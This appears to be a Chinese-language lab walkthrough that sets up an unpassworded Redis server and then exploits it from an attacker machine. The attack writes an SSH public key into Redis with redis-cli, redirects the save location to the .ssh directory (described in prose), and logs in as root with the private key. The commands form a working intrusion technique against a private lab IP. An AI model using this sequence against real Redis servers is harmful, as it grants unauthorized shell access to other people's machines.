在服务器上开启Redis服务
wget http://download.redis.io/redis-stable.tar.gz
解压
tar -xvf redis-stable.tar.gz
进入文件夹,编译
make
编译完成之后,修改redis.conf 中的daemonize从no改为yes,允许后台运行,并修改服务监听的地址为服务器IP。
进入src文件夹,使用redis.conf配置来运行服务
./redis-server /usr/redis-stable/redis.conf
查看运行情况
ps aux | grep redis
运行src文件夹中的redis-cli,进入服务,此时未设置密码
且服务器已开启ssh服务
service ssh start
service ssh status
攻击方
同样需要下载,解压Redis的文件,进入src文件夹,运行redis-cli尝试登录该服务器
生成RSA密钥文件,默认存放在/root/.ssh/id_rsa,服务器上也需要有此路径才能成功
ssh-keygen -t rsa
将公钥写入到此文件夹的一个空文件中
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n"; ) > fooing.txt
回到Redis的src文件夹中运行redis-cli,将该公钥插入Redis服务器中,设置用户名为foo
cat /root/.ssh/fooing.txt | ./redis-cli -h 192.168.23.128 -x set foo
再尝试登录Redis服务器,发现Redis服务器已经被插入foo账户,接着修改配置文件夹为RSA密钥存放的路径,并设置dbfilename,以此中信息登录
最后以该RSA的私钥登录成功目标主机